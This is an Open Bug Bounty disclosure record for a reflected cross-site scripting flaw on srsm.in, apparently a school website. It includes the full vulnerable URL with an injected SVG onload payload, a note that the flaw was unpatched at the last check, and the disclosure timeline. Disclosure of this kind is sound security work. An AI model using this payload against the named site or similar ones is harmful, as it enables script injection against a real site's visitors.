srsm.in XSS vulnerability

2016-11-30T06:06:00
ID OBB:195573
Type openbugbounty
Reporter HARSHJOSHI
Modified 2016-12-28T06:13:00

Description

Vulnerable URL:
http://www.srsm.in/viewgallery3.jsp?topic=CBSE%20Regional%20Level%20Science%20Exhibition%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&pby;=Admin&msg;=1118281220151246362.txt&image1;=1118060120161123531..jpg&image2;=1118060120161159011.jpg&image3;=&image4;=&image5;=&image6;=&image7;=&image8;=&image9;=&image10;=&att;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 02.09.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 8147170
VIP website status:| No
Check srsm.in SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 November, 2016 06:06 GMT
Generic security notifications sent to website owner| 30 November, 2016 06:09 GMT
Vulnerability details disclosed by researcher| 28 December, 2016 06:13 GMT